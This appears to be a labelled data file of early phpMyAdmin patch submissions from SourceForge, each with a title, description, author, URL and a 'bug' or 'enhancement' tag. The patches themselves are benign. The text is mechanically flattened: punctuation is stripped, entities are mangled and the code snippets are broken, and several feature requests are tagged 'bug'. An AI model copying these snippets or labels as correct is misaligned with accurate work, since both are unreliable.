This patch allows you to disable the function fields in edit insert mode by setting cfgShowFunctionFields = FALSE; I changed the following files config.inc.php line 143 Added cfgShowFunctionFields libraries common.lib.php lines 138 140 compatibility with old config.inc.php tbl change.php lines 145 147 Don t display amp;lt;TH amp;gt; amp;lt; TH amp;gt; when cfgShowFunctionFields = FALSE lines 247 284 Don t display the function field when cfgFunctionFields = FALSE I hope I could help you, Rabus Original URL https sourceforge.net p phpmyadmin patches 80 https sourceforge.net p phpmyadmin patches 80 Original author rabus","bug"
"24444","4025","Go button in light mode.
The Go button in left.php light mode) was labled with amp;quot;Go amp;quot; instead of strGo.
Because of this it is not translated.
Original URL https sourceforge.net p phpmyadmin patches 81 https sourceforge.net p phpmyadmin patches 81 Original author rabus","bug"
"24444","4026","Feature Request 516852 no links if no data).
This patch disables the links amp;quot;Browse amp;quot;, amp;quot;Select amp;quot;, and amp;quot;Empty amp;quot; inside the database overview if the corresponding table is empty consists of 0 rows).
I hope I could help you, Rabus Original URL https sourceforge.net p phpmyadmin patches 82 https sourceforge.net p phpmyadmin patches 82 Original author rabus","bug"
"24444","4027","left.php3 a little fix.
There were no WIDTH and HEIGHT parameters of amp;lt;IMG... amp;gt; element for `browse.gif` image.
Original URL https sourceforge.net p phpmyadmin patches 83 https sourceforge.net p phpmyadmin patches 83 Original author ubanus","bug"
"24444","4028","Add charset when asking for auth.
This patch adds header with charset when authentification fails.
Original URL https sourceforge.net p phpmyadmin patches 84 https sourceforge.net p phpmyadmin patches 84 Original author nijel","bug"
"24444","4029","Added Change Password to phpMyAdmin.
Added Change Password to phpMyAdmin I think this is a feature a lot of users were waiting for to change the password of the MySQL user that is logged into phpMyAdmin.
Attached is a diff file for main.php, a new file user password.php and a proposed ChangeLog entry Original URL https sourceforge.net p phpmyadmin patches 85 https sourceforge.net p phpmyadmin patches 85 Original author tscargo","bug"
"24444","4030","Patch for long database names left frame.
I have some long database names that didn t fit in the standard 250 pixel wide left hand frame.
I would have had to make the left hand frame around 500 px wide to fit it, so instead I used substr on the db names if they were over a certain size.
I have included the original left.php, the new left.php, and a diff.
Do with it what you like.
Cheers, Ethan B. Kattare) www.kattare.com Original URL https sourceforge.net p phpmyadmin patches 86 https sourceforge.net p phpmyadmin patches 86 Original author kattare","bug"
"24444","4031","fixed bug 528504.
Bug 528504 appeared when amp;quot;error reporting amp;quot; was set to amp;quot;E ALL amp;quot; in the php.ini file and the auth type was set to amp;quot;cookie amp;quot;.
Please try out the attached file.
Original URL https sourceforge.net p phpmyadmin patches 87 https sourceforge.net p phpmyadmin patches 87 Original author rabus","bug"
"24444","4032","display something in title when no db.
hi this simple patch just adds amp;quot;phpMyAdmin amp;quot; to tile when no database table is selected.
I think that amp;quot;phpMyAdmin running on somewhere amp;quot; looks better than just amp;quot;running on somewhere amp;quot;.
Nijel Original URL https sourceforge.net p phpmyadmin patches 88 https sourceforge.net p phpmyadmin patches 88 Original author nijel","bug"
"24444","4033","Check All Uncheck All patch.
Here is a few code lines to make the Check All Uncheck All stuff work even if there is only one table listed.
I dunno how to create your patch files so I ll just tell you the file to modify plus the line and function name.
Moreover, this should work with IE, but I have no idea about Netscape or other browsers... library functions.js, line 368 old version function setCheckboxes the form, do check) \{ var elts = document.forms[the form].elements [ selected tbl[] ]; var elts cnt = elts.length; for var i = 0; i amp;lt; elts cnt; i ) \{ elts[i].checked = do check; \} end for return true; \} end of the setCheckboxes ) function becomes new version function setCheckboxes the form, do check) \{ var elts = document.forms[the form].elements [ selected tbl[] ]; var elts cnt = elts.length; if typeof elts cnt) != undefined ) \{ for var i = 0; i amp;lt; elts cnt; i ) \{ elts[i].checked = do check; \} end for \} else \{ elts.checked=do check; \} end if return true; \} end of the setCheckboxes ) function Leblanc Original URL https sourceforge.net p phpmyadmin patches 89 https sourceforge.net p phpmyadmin patches 89 Original author anonymous","bug"
"24444","4034","makes insert new row sticky.
on the insert new row page, makes the insert another row checkbox remember the same state as last time.
This helps when adding lots of rows.
Original URL https sourceforge.net p phpmyadmin patches 90 https sourceforge.net p phpmyadmin patches 90 Original author anonymous","enhancement"
"24444","4035","main.php3 get users priv.
with SHOW GRANTS.
A user with these right doesn t see amp;quot;Create Database amp;quot; on phpMyAdmin s front page.
GRANT Create ON prefix .
TO username hostname ; This user can create databases if he does so manually by submitting a MySQL query like CREATE DATABASE prefix mydb ; Original URL https sourceforge.net p phpmyadmin patches 91 https sourceforge.net p phpmyadmin patches 91 Original author rabus","bug"
"24444","4036","2.2.5) workaround against bug 536623.
Please try out this workaround.
If someone uses NN 4.x the contents of the textarea box is only selected at the first onFocus event.
Original URL https sourceforge.net p phpmyadmin patches 92 https sourceforge.net p phpmyadmin patches 92 Original author rabus","bug"
"24444","4037","relation links printview.
in tbl printview after Fields properties, line 137) For showing of Relations Mike Beck, modified by Lem9) if !empty cfgServer[ relation ])) \{ rel query = SELECT src column,concat dest table,\ .\ ,dest column) a s rel ; rel query .= FROM .
cfgServer[ relation ]; rel query .= WHERE src table = \ .
table.
\ ; relations = mysql query rel query) or PMA mysqlDie , rel query, , err url); while relrow =mysql fetch array relations))\{ col = relrow[ src column ]; res rel[ col]= relrow[ rel ]; debug echo amp;quot;col amp;quot;.
col. amp;quot; amp;quot;.
relrow[ rel ].
amp;quot; amp;lt;br amp;gt; amp;quot;; \} \} line 172 new headercell) amp;lt;!
MikeBeck for showing of Relations.
Add strRel to translations!
amp;gt; amp;lt;th amp;gt; amp;lt;?php echo ucfirst strRel); ?
amp;gt; amp;lt; th amp;gt; line 232 amp;lt;td bgcolor= amp;quot; amp;lt;?php echo bgcolor; ?
amp;gt; amp;quot; nowrap= amp;quot;nowrap amp;quot; amp;gt; amp;lt;?
php echo res rel[ field name]; ?
amp;gt; amp;amp;nbsp; amp;lt; td amp;gt; in lang english.inc.php line 120 strRel = Links to ; in lang german.inc.php strRel = Verknxc3xbcpfung ; to do display the new column only if there are links from this table declare res rel as an array and reset it between tables use strLinksTo instead of strRel Original URL https sourceforge.net p phpmyadmin patches 94 https sourceforge.net p phpmyadmin patches 94 Original author lem9","bug"
"24444","4038","Relation schema in pdf.
From Maxime Delorme delorme.maxime at free.fr) You will need the last version of fpdf fpdf.org Please if you want to use it leave my name Maxime Delorme ) At the end of the script, the object is launch by rt = new RT amp;quot;auto amp;quot;,1,1,1); scaling leave auto for best result next is dimension of table should be displayed in the header ?
next are the relations colored ?
next ; show grid ?
you can put directly a scale factor ex 3 for a structure 3 times smaller than the 1 factor normal view).
With fpdf it is easier to control what you do on one page because you can t walk through the pdf .
So the doc is made correctly by staying on the same page.
So if you don t know the place needeed for the doc you can choose auto for the value of the scale.
It would be easy to add header or footer on the doc.
In the header of each table of the pdf sample you can see zzzxzzz it is the width and the height of the table.
kind of information very interesting for place correctly the table) you can turn it off if you want second paramater) int scale fix mod the position of the table is fixed in the table pos tab see the SQL given only positive value are require, 0,0 is the top left corner of the page, 100,200 means that the table will be at 200 mm under and 100 mm on the right of the left top cornet of the page if you stay in normal view scale factor 1) , otherwise it could be for relative positionning of the differents tables) in auto mode the view in center on the tables It s not perfect but is could be improve .
If you need some explanation ask me.
I think the next improvment will be the possibility to choose which kind of relations has to be drawn by adding a new column in the table amp;quot;relation amp;quot; titled category or something like that where close in the sql ) Original URL https sourceforge.net p phpmyadmin patches 96 https sourceforge.net p phpmyadmin patches 96 Original author lem9","bug"
"24444","4039","after 2.2.6) Different charsets in HTTP and MySQL.
Hi here is patch that allows to use different charset in MySQL queries and in HTTP HTML).
It uses recode or iconv so it needs one of there extensions loaded.
Primary target was to allow using UTF in HTTP while MySQL can stay in other charset.
This patch is almost surely still not ready for including in phpMyAdmin now, but please test it.
Nijel Original URL https sourceforge.net p phpmyadmin patches 93 https sourceforge.net p phpmyadmin patches 93 Original author nijel","bug"
"24444","4040","Dynamic server numbers in config file.
From amp;quot;Simon amp;quot; in the amp;quot;Open Discussion amp;quot; forum At the moment it s a bit of a pain to add remove reorder servers in the config file, because each entry must change the [n] to [m] eg cfgServers[1][ password ] = ; Something that I ve been doing for my own config for a while, and thought would be better to distributed with the tool, is to use a variable for the index!
i = 0; i ; cfgServers[ i][ host ] = db2machine ; cfgServers[ i][ port ] = ; ... i ; cfgServers[ i][ host ] = db2machine ; cfgServers[ i][ port ] = ; That way, you can move servers around the list without modifying all the indexes, you can comment out a server, and you can cut paste servers easily.
Just include the i at the top of each block.
YMMV, Simon Original URL https sourceforge.net p phpmyadmin patches 95 https sourceforge.net p phpmyadmin patches 95 Original author loic1","bug"
"24444","4041","Feature Request 53570 tbl qbe amp; rel.
i just finished the code.
the diff i attach should work with ver 2.2.6 rc1.
it did turn out to be rather more code than i expected 177 lines) but i think it is quite nice now it checks for fields in the where clause.
out of these if there are many) it takes those that start with an = because mysql can work better with those than with those starting with like ) than checks which of those are mentioned in the relationtable as related to the other tables) and starts the FROM with the one table that has most entries.
master).
then it left joins all that are related to those master table and last those that are related to those that are related to the mastertable.
this turned out to create useful queries in my tests let s see who is able to do the same with less than 100 lines of code lol Original URL https sourceforge.net p phpmyadmin patches 97 https sourceforge.net p phpmyadmin patches 97 Original author mikebeck","bug"
"24444","4042","[2.2.6rc2] Read SQL file from webserver.
I implemented the possibility to read SQL statements from a file in a specified directory on the webserver.
There is a new form entry which allows selection of a file in a directory on the webserver which has been defined in configuration.
Original URL https sourceforge.net p phpmyadmin patches 98 https sourceforge.net p phpmyadmin patches 98 Original author s03nk3","bug"
"24444","4043","2.2.6) Http auth and IIS.
From an user comment at the php manual if PHP AUTH USER == amp;amp; amp;amp; PHP AUTH PW == amp;amp; amp;amp; isset HTTP AUTHORIZATION) amp;amp; amp;amp; ereg Basic , HTTP AUTHORIZATION)) \{ list PHP AUTH USER, PHP AUTH PW) = explode , base64 decode substr HTTP AUTHORIZATION, 6))); \} It worked for me on IIS 5 and PHP 4 in ISAPI Original URL https sourceforge.net p phpmyadmin patches 99 https sourceforge.net p phpmyadmin patches 99 Original author loic1","bug"
"24444","4044","2.2.6) file exists goto.
Fixes unnecessary fstat errors.
Nice if you suppress warnings, but it s not enough.
Original URL https sourceforge.net p phpmyadmin patches 100 https sourceforge.net p phpmyadmin patches 100 Original author nyvlem","bug"
"24444","4045","DB Table titles should be links.
I ve found this an immensely useful shortcut in my own daily tasks, as have the other folks I ve added this for.
CVS s header.inc, replace lines 160,162 with these echo amp;lt;h1 amp;gt; .
strDatabase .
amp;lt;a class= amp;quot;h1 amp;quot; href= amp;quot;db details.php?lang= .
lang.
amp;amp;server= .
server.
amp;amp;db= .
db.
amp;quot; amp;gt; amp;lt;i amp;gt; .
htmlspecialchars db) .
amp;lt; i amp;gt; amp;lt; a amp;gt; ; if !empty table)) \{ echo .
strTable .
amp;lt;a class= amp;quot;h1 amp;quot; href= amp;quot;db details.php?lang= .
lang.
amp;amp;server= .
server.
amp;amp;db= .
db.
amp;amp;table= .
table.
amp;amp;goto=db details.php amp;quot; amp;gt; amp;lt;i amp;gt; .
htmlspecialchars table) .
amp;lt; i amp;gt; amp;lt; a amp;gt; ; I m sure that it could stand some urlencoding, but the important thing is that the class is assigned in the link tag.
Original URL https sourceforge.net p phpmyadmin patches 101 https sourceforge.net p phpmyadmin patches 101 Original author allah03","bug"
"24444","4046","Search into database.
This simple script allows to search into any tables in a database.
Original URL https sourceforge.net p phpmyadmin patches 104 https sourceforge.net p phpmyadmin patches 104 Original author chaume92","bug"
"24444","4047","DB Table titles should be links.
I ve found this an immensely useful shortcut in my own daily tasks, as have the other folks I ve added this for.
CVS s header.inc, replace lines 160,162 with these echo amp;lt;h1 amp;gt; .
strDatabase .
amp;lt;a class= amp;quot;h1 amp;quot; href= amp;quot;db details.php?lang= .
lang.
amp;amp;server= .
server.
amp;amp;db= .
db.
amp;quot; amp;gt; amp;lt;i amp;gt; .
htmlspecialchars db) .
amp;lt; i amp;gt; amp;lt; a amp;gt; ; if !empty table)) \{ echo .
strTable .
amp;lt;a class= amp;quot;h1 amp;quot; href= amp;quot;db details.php?lang= .
lang.
amp;amp;server= .
server.
amp;amp;db= .
db.
amp;amp;table= .
table.
amp;amp;goto=db details.php amp;quot; amp;gt; amp;lt;i amp;gt; .
htmlspecialchars table) .
amp;lt; i amp;gt; amp;lt; a amp;gt; ; I m sure that it could stand some urlencoding, but the important thing is that the class is assigned in the link tag.
Original URL https sourceforge.net p phpmyadmin patches 102 https sourceforge.net p phpmyadmin patches 102 Original author allah03","bug"
"24444","4048","Jumping cursor using keyboard.
for file tbl properties.inc.php3 ctrl up down left right move cursor between rows cells when insert editing Original URL https sourceforge.net p phpmyadmin patches 103 https sourceforge.net p phpmyadmin patches 103 Original author xuefer","bug"
"24444","4049","procedure analyse );.
there is one SQL for MySQL which i think only few users know of but much more should and i for example know of it but always forget the bloody syntax ; ) MySQL can show you what an optimal structure for your table would be.
He does go wrong in desperately trying to propose enum for nearly all textfields, but still gives a lot of useful information.
if you add the following code amp;lt;!
Let MySQL propose the optimal structure amp;gt; amp;lt;li amp;gt; amp;lt;div style= amp;quot;margin bottom 10px amp;quot; amp;gt; amp;lt;?php sqlstruct = urlencode SELECT FROM .
PMA backquote table).
procedure analyse ) ); ?
amp;gt; amp;lt;a href= amp;quot;sql.php3?
session max rows=all amp;amp;sql query= amp;lt;?php echo sqlstruct; ?
amp;gt; amp;amp; amp;lt;?php echo url query; ?
amp;gt; amp;quot; amp;gt; amp;lt;?php echo strStructPropose; ?
amp;gt; amp;lt; a amp;gt; amp;lt; div amp;gt; amp;lt; li amp;gt; at line 540 of tbl properties structure.php3 right before the final amp;lt; ul amp;gt;.
I am talking of the 2.3.0 csv version as of May 23rd here, i just don t want to make a patch as it might get more difficult with this file still changing and also i need a new string strStructPropose = Propose Table Structure ; to the translations now you can easily choose to run this from the structure page of the tableproperties.
cheers mike Original URL https sourceforge.net p phpmyadmin patches 105 https sourceforge.net p phpmyadmin patches 105 Original author mikebeck","bug"
"24444","4050","patch for bug 461192 and more.
Hi, I want to propose an easy fix for a well known bug Bug report 461192 wrong counted rows with amp;quot;group amp;quot; queries) as well as the following more exotic bugs im not sure are they reported or non) 1) PMA dont add LIMIT clause when FROM is not separated with a [ space ], as in the legal queries SELECT` `FROM tbl; or SELECT FROM tbl); In this case all rows are displayed but PMA claims there are cfgMaxRows 2) PMA dont add LIMIT clause when SELECT COUNT expr) is used with GROUP BY clause, but in this case the result is not only one row but an arbitrary long table, so we need a LIMIT.
So to fix all 3 bugs, I first added a function which separate some reserved words with a space from the backquoted and parenthisized expressions.
I placed it in the end of sql.php but maybe common.lib.php is better choice.
Caling this function in the begining of sql.php fix the bug 1).
After that I defined a variable is group together with other is ... variables, and changed is count definition is group = eregi GROUP BY | HAVING | SELECT DISTINCT ) , sql query)); is count = !
is group amp;amp; amp;amp; eregi SELECT.... With this the bug 2) is fixed too.
And the last thing is to change the way we calculate the unlim num rows array = split FROM | ORDER BY ) , sql query); ..... unlim num rows = is group?
mysql num rows cnt all result) mysql result cnt all result, 0, count ); That s all...
Attached file is the patched sql.php v.1.105 from CVS.
Svetlio PS Sorry, if im not very clear because english is not my first natural) language, but the fourth. )
Original URL https sourceforge.net p phpmyadmin patches 106 https sourceforge.net p phpmyadmin patches 106 Original author svetlio","bug"
"24444","4051","Wrong row count on DISTINCT queries.
When running a DISTINCT query such as SELECT DISTINCT id FROM table the wrong row count is reported because the distinct is not taken into account when running the separate query to calculate row count.
We fixed this by using a regular expression check to detemine if a distinct query was run.
If so, we then run a separate count query and report that row count.
These changes were made in the IF statement starting on row 295 of sql.php.
New code if !empty array[1])) \{ ... and makes a count ) to count the entries if eregi amp;quot;distinct . )
from amp;quot;, sql query, reg)) count query = SELECT COUNT distinct .
reg[1]. )
AS count FROM .
array[1]; else count query = SELECT COUNT ) AS count FROM .
array[1]; OPresult = mysql query count query); if OPresult) \{ unlim num rows = mysql result OPresult, 0, count ); \} mysql free result OPresult); \} else \{ Original URL https sourceforge.net p phpmyadmin patches 107 https sourceforge.net p phpmyadmin patches 107 Original author anonymous","bug"
"24444","4052","tabbed navigation.
I changed the main navigation links to tabs like google) in tbl properties links.php3 and db details links.php3.
Additionaly, I fixed a bug on line 55 of tbl properties links.php,v 1.14 2002 05 05 08 28 43 amp;quot; .
sub part .
amp;quot; has not the desired effect outside of amp;lt;?php and ?
amp;gt;.
Original URL https sourceforge.net p phpmyadmin patches 108 https sourceforge.net p phpmyadmin patches 108 Original author jfornall","bug"
"24444","4053","2.3.0 cvs) Make tabs nicer.
This patch makes the tabs in db detals and table properties look nicer.
Michal Original URL https sourceforge.net p phpmyadmin patches 109 https sourceforge.net p phpmyadmin patches 109 Original author nijel","bug"
"24444","4054","Fix charset conversion.
This adds charset conversion for database name in PMA mysql list fields.
Patch againt current cvs.
Michal Original URL https sourceforge.net p phpmyadmin patches 110 https sourceforge.net p phpmyadmin patches 110 Original author nijel","bug"
"24444","4055","textarea selected logic.
the logic for the textarea selection is always true on non broken == non NS4) browsers.
Patch fixes that.
Original URL https sourceforge.net p phpmyadmin patches 111 https sourceforge.net p phpmyadmin patches 111 Original author nyvlem","bug"
"24444","4056","Optional disabling of utf 8.
Quite simple patch for optionaly disabling utf 8 translations.
It adds config option UseUnicodeTranslations.
This option will be overeidden by AllowAnywhereRecoding if it is set to TRUE.
Description of this new config should be also added into docs, but I m planning to rewrite charsets conversion docs anyway and hope it will be till 2.3.0) so if it is really needed add to doc description from config.
This should avoid bugs like 582463 and 576655 and maybe more, I didn t look at all bugs).
Michal Original URL https sourceforge.net p phpmyadmin patches 112 https sourceforge.net p phpmyadmin patches 112 Original author nijel","bug"
"24444","4057","hard to repair locked tables.
on certain servers, tables sometimes lock for no reason, and have to be unlocked with a REPAIR TABLE statement.
i can t issue this through the phpMyAdmin interface directly since i can t bring up the table page while the table is in use.
there are two ways this could be fixed 1) display the repair control on the table view page, even when the table is locked out 2) add repair table to the drop down list of actions on the database view page a patch to accomplish this second version is attached as two diff files file, but is not comprehensive it doesn t display the results, just that it was executed like the optimize tables option).
it might also be prudent to add this optionally) right into the tables table on the structures page.
Original URL https sourceforge.net p phpmyadmin patches 113 https sourceforge.net p phpmyadmin patches 113 Original author iamcal","bug"
"24444","4058","large edit link patch gt; 2.3.1).
if i select some datas from a table with the select function of the myadmin i have an error i got two results which were shown and if i scroll over them they change color to kind of orange.
this colorchange script is possible the reason why i cannot press the amp;quot;edit amp;quot; link to change this particular datasheet.
i have the same problem after i updated to 2.3.0 rc4 but now if i use the right mouse button and say open in new window, it works this way.
i tryed this in the old version too but there just seemed to be no link under it.
Original URL https sourceforge.net p phpmyadmin patches 114 https sourceforge.net p phpmyadmin patches 114 Original author rubo77","bug"
"24444","4059","Local quot; .sql quot; import.
From an anonymous user at the phpMyAdmin forums Hi, about this dirty hack.
english isnt good) My .sql Dumps are so large for example 6 MB) every server timed out.
So I want to separate upload and fileimport.
For example you have a accessable Dir like amp;quot;.. MyDump amp;quot; and in that Dir you can Upload your huge .sql file.
After That You can CLick on Import and you will see that Dir with all .sql files listed.
Click on the File you want to import and it will run the same script as the upload import way.
If the script is done the right frame will be blank.
I don t know why that happen, because I transfer nearly the same Variables via GET to the read dump.php script.
Never the less, here are some detail informations about the script.
config.inc.php Line 287 I add this Var to give users a chance to define a Dir who they can upload .sql files.
If that Idea goes gold there are some sequrity stuff that that dir is on the same user home dir and so on.
But at the moment its Ok, to demonstrate that way to import huge files.
db details links.php LIne 66 I add a Tab for an Import ... linked to a new file called diplay dumpdir.php display dumpdir.php This file is new, and just small as usual.
It contains a very cheap directory read and display function and a filesize function which not work properly.
And it Displays a Table with filename, Size and a link to import the choosen file.
nothing more.
Note that here are again the cfg[ SQLDumpPath ] variable, because I dont know the require structure in PMA, thus I add this manualy.
read dump.php Line 224 231 Acording to the filename setup in variable locke file and Path in locke path a copy of the followring code is placed here to read the choosen file.
I have to use addslashes because after reading the whole file every slash is removed and that occurs errors in the following php code.
Well Thats all.
Its very cheap and ugly but it seems to work.
It would be great if that idea have a chance.
I have also another idea based on sessions or if sessions not allowed separated text files.
Ok My Biggest SQL Dump has 6 MB with may be 30.000 Querys.
The most servers times out because its to heavy.
And I dont have access to the mysql console.
Well, Some time ago I wrote a script that calls itself again after being ready with 1000 inserts.
It would be nice if the read dump script could optionally write the separated Querys to a session in a very phatt array, and then popup a window which writes to the local MySQL DB in 1000 Steps or more) and reload after 1000 inserts and so on till the end.
So it will be possible to import huge dumps via .sql and PhpMyAdmin.
May be I hack a phpMyAdmin further version to demonstate it.
But I m not very common with the coding structure and CVS stuff.
Original URL https sourceforge.net p phpmyadmin patches 115 https sourceforge.net p phpmyadmin patches 115 Original author loic1","enhancement"
"24444","4060","phpMyAdmin logo.
I ve used phpMyAdmin for quite a while and really help me a lot.
I use this graphic at the bottom of my page to show my appreciation.
Hope you found it useful.
It s PNG 88x31 pixel.
Original URL https sourceforge.net p phpmyadmin patches 116 https sourceforge.net p phpmyadmin patches 116 Original author ivanlanin","enhancement"
"24444","4061","Show the array number in tbl properties.
Show the array number in tbl properties helpfully together with ysql fetch row ) only change the lines 134 135 tbl properties structure.php [v 2.3.0] amp;lt;td norwap align= amp;quot;center amp;quot; bgcolor= amp;quot; amp;lt;?php echo bgcolor; ?
amp;gt; amp;quot; amp;gt; amp;lt;?echo i 1;?
amp;gt; amp;lt;input type= amp;quot;checkbox amp;quot; name= amp;quot;selected fld[] amp;quot; value= amp;quot; amp;lt;?php echo field encoded; ?
amp;gt; amp;quot; id= amp;quot;checkbox row amp;lt;?php echo i; ?
amp;gt; amp;quot; amp;gt; thanks Claude Original URL https sourceforge.net p phpmyadmin patches 120 https sourceforge.net p phpmyadmin patches 120 Original author anonymous","bug"
"24444","4062","Dropdown box for foreign key values 2.
PHPMyAdmin already stores information about foreign keys.
When displaying records, it can overlay a foreign key with information from the foreign table.
Unfortunately, this information is not available when editing or creating records yet.
This patch alleviates that problem.
Regardless of the field type, foreign key fields are displayed as dropdown boxes containing legal foreign keys and the corresponding display values.
Original URL https sourceforge.net p phpmyadmin patches 117 https sourceforge.net p phpmyadmin patches 117 Original author anonymous","bug"
"24444","4063","fix to run with no Relations set.
This is the only case I could find of this problem.
Index tbl change.php3 ========================================= ========================== RCS file cvsroot phpmyadmin phpMyAdmin tbl change.php3 ,v retrieving revision 1.103 diff r1.103 tbl change.php3 141c141,143 amp;lt; foreigners = PMA getForeigners db, table); amp;gt; if cfgRelation[ relwork ]) \{ amp;gt; foreigners = PMA getForeigners db, table); amp;gt; \} Original URL https sourceforge.net p phpmyadmin patches 118 https sourceforge.net p phpmyadmin patches 118 Original author mallan2","bug"
"24444","4064","quot;Insert data from a textfile quot; bug patch.. ldi check.php Thu Sep 5 15 24 43 2002 ldi check.php Thu Sep 5 15 29 22 2002 51,7 51,7 \} Builds the query query = LOAD DATA LOCAL INFILE \ .
textfile .
\ ; \ query = LOAD DATA INFILE \ .
textfile .
\ ; if !empty replace)) \{ query .= .
replace; \} Original URL https sourceforge.net p phpmyadmin patches 119 https sourceforge.net p phpmyadmin patches 119 Original author doggy8088","bug"
"24444","4065","Null for foreign keys.
The null checkbox doesn t work for the foreign key code I initially submitted.
I noticed, and I fixed that.
In addition, the new foreign key handler correctly includes backup field.
Thus, partial updates work for foreign keys, too.
OK, so I reactivated my sf.net account.
See if the file upload works now.
Original URL https sourceforge.net p phpmyadmin patches 121 https sourceforge.net p phpmyadmin patches 121 Original author mlnoga","bug"
"24444","4066","Foreign key selection for Select sub page.
This patch adds foreign key selection for query by example.
It duplicates large amounts of code from tbl change.php in tbl select.php.
In an ideal world, the shared code should be factored out into a ForeignKeyUI class especially considering that future enhancements may add up down arrows to change the limit clause for the selection box.
Original URL https sourceforge.net p phpmyadmin patches 122 https sourceforge.net p phpmyadmin patches 122 Original author mlnoga","bug"
"24444","4067","CSV import gt;2.3.2).
This patch adds CSV table import to PhpMyAdmin.
It adds an import pane to the table export dialog.
There are four classes CSVParser, CSVHandler abstract), CSVHandlerHTML and CSVHandlerInsert.
CSVParser parses CSV files, invoking a handler on individual rows.
The class can be parameterized with separator, quote and escape characters.
The HTML handler prints the table for debugging etc.)
The Insert handler builds an SQL Insert statement.
It can be parameterized to treat column headings as field names.
Some work remains to be done.
The strings in the last dozen lines of tbl insert.php need to be internationalized.
This also holds for the strings in the import dialog pane.
Additionally, we might consider changing the Export tab in the table structure view to an Export Import tab, or adding a separate Import tab.
Original URL https sourceforge.net p phpmyadmin patches 123 https sourceforge.net p phpmyadmin patches 123 Original author mlnoga","bug"
"24444","4068","Date and Time Appendix to export files.
Hello developers !
I implemented a date and time appendix to the database export files like SQL or CSV) for being able to create an export archive for my database.
For this, the follwing lines of codes need to be added db details export.php ====================== [Insert this behind the zip, gzip and bzip2 feature] echo amp;quot; amp;lt;br amp;gt; amp;lt;input type=\ amp;quot;checkbox\ amp;quot; name=\ amp;quot;appenddatetime\ amp;quot; value=\ amp;quot;yes\ amp;quot; id=\ amp;quot;checkbox appenddatetime\ amp;quot; amp;gt;\n amp;quot;; echo amp;quot; amp;lt;label for=\ amp;quot;checkbox appenddatetime\ amp;quot; amp;gt;append date and time to filename amp;lt; label amp;gt;\n amp;quot;; echo amp;quot;\n amp;quot;; tbl dump.php ============ [Insert this behind the Download comment after defining the filename from DB or TABLE] if appenddatetime == amp;quot;yes amp;quot;) filename .= date amp;quot;YmdHis amp;quot;); I would be grateful if this feature would be added from your developer s side, and or I would be informed, whether this feature can be implemented.
Greetings Kai M Poppe Original URL https sourceforge.net p phpmyadmin patches 124 https sourceforge.net p phpmyadmin patches 124 Original author sdcepoppe","bug"
"24444","4069","typo in documentation.
Line 333 334 of Documentation.txt reads GRANT SELECT,INSERT,DELETE ON phpmyadmin.
to pma localhost; That should instead read GRANT SELECT, INSERT, DELETE, UPDATE ON phpmyadmin.
to pma localhost ; Note the quotes around amp;quot;localhost amp;quot; and the addition of the UPDATE privilege [which is handy if one wants to update a PDF report! )
].
Keep up the great work!
vjl Original URL https sourceforge.net p phpmyadmin patches 125 https sourceforge.net p phpmyadmin patches 125 Original author vjl323","bug"
"24444","4070","Analyzer and column aliases.
This fixes the alias part of the bug 618272.
I submit it as a patch to get some feedback.
Original URL https sourceforge.net p phpmyadmin patches 127 https sourceforge.net p phpmyadmin patches 127 Original author lem9","bug"
"24444","4071","user password.php broken 2.2.7pl1.
user password.php doesn t work.
when using http auth method and trying to change a password with the change password link users were getting errors indicating a lack of a database connection.
IE, no mysql connect had been run.)
Turns out someone forgot to specify the server to connect to in the password form.
Fix follows.
user password.php diff ignore the version line, I was using rcs to edit.)
2c2 amp;lt; Id user password.php,v 1.6 2002 04 10 20 23 51 loic1 Exp amp;gt; Id user password.php,v 1.3 2002 10 19 19 41 56 kattare Exp 11d10 amp;lt; 105a105,106 amp;gt; amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;lang amp;quot; value= amp;quot; amp;lt;?php echo lang; ?
amp;gt; amp;quot; amp;gt; amp;gt; amp;lt;input type= amp;quot;hidden amp;quot; name= amp;quot;server amp;quot; value= amp;quot; amp;lt;?php echo server; ?
amp;gt; amp;quot; amp;gt; Original URL https sourceforge.net p phpmyadmin patches 128 https sourceforge.net p phpmyadmin patches 128 Original author kattare","bug"
"24444","4072","2.3.1) Fix for change field bug.
Using phpMyAdmin 2.3.1 and php 4.2.3 on a Linux box I can t change the length or default values of a field unless the strcmp s on line 51 amp;amp; 55 in tbl alter.php are changed from 51 if strcmp str replace amp;quot; , amp;amp;quot; , field default orig [ i]), field default[ i])) \{ 55 if strcmp str replace amp;quot; , amp;amp;quot; , field length orig[ i]), field length[ i]) ) \{ to 51 if strcmp str replace amp;quot; , amp;amp;quot; , field default orig [ i]), field default[ i]) == 0) \{ 55 if strcmp str replace amp;quot; , amp;amp;quot; , field length orig[ i]), field length[ i]) ==0) \{ Sorry, I don t have the energy today to submit a proper patch for this... Mats Original URL https sourceforge.net p phpmyadmin patches 126 https sourceforge.net p phpmyadmin patches 126 Original author matseng","bug"
"24444","4073","Adds the LaTeX to the export list.
Creates the table dump of ALL columns in the longtable sideways table environments TO DO add option to select what columns to export Original URL https sourceforge.net p phpmyadmin patches 129 https sourceforge.net p phpmyadmin patches 129 Original author valentinem","bug"
"24444","4074","PDF shema.
I made a patch for the pdf schema.php This time it made a full doc.
like the dictionnary.
with link , bookmark , TOC.
links are from TOC to pages, from forreign field to master field, from chema to field or table only 2 or 3 new string are need to be translated and with one parameter at the end with doc = 0 ) the pdf could be only the pdf schema.
Original URL https sourceforge.net p phpmyadmin patches 130 https sourceforge.net p phpmyadmin patches 130 Original author mdelorme","bug"
"24444","4075","Fix for Output Handler warning php gt;= 4.3.0.
If the output buffering enabled in the php.ini as it is in the php.ini recommended file) php 4.3.0 emits a warning if you try to add a new ob handler with ob start ).
The warning looks liks this Warning null) ) [ref.outcontrol] output handler ob gzhandler cannot be used twice in Unknown on line 0 This patch for PMA outBufferModeGet ) checks for any type of existing output handler and sets the mode to 0 if there is one already.
It could probably also be done by ini get output buffering ) explicitly, but I think that this method is better.
Mats Original URL https sourceforge.net p phpmyadmin patches 131 https sourceforge.net p phpmyadmin patches 131 Original author matseng","bug"
"24444","4076","SELECT and enum fields.
Feature suggestion It would be great if you could add a dropdown box a radio button for enum fields when doing a SELECT.
It would be very helpfull.
Original URL https sourceforge.net p phpmyadmin patches 132 https sourceforge.net p phpmyadmin patches 132 Original author j0erch","enhancement"
"24444","4077","Connection error message for cookie based auth.
The phpMyAdmin with cookie based authentication should show connection error message, i.e.
if wrong error was given.
Original URL https sourceforge.net p phpmyadmin patches 133 https sourceforge.net p phpmyadmin patches 133 Original author d3xter","bug"
